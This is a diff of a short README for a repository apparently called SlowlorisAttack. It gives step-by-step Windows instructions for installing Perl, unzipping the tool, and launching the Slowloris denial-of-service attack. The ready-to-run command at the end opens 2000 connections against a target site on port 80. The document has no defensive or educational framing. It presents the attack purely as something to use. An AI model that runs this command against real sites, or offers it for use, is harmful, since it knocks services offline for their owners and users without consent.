masudshrabon/SlowlorisAttack/README.md

 # SlowlorisAttack on Windows

-Download and install active perl from the given link: http://www.activestate.com/activeperl/downloads
+1. Download and install active perl from the given link: http://www.activestate.com/activeperl/downloads

+2. Download the SlowlorisAttack and unzip it.

-Open cmd and hit the command:
+3. Open cmd and go to the folder SlowlorisAttack by the cmd.

+4. Hit the command:

  slowloris.pl -dns (target site address) -port 80 -timeout 1 -num 2000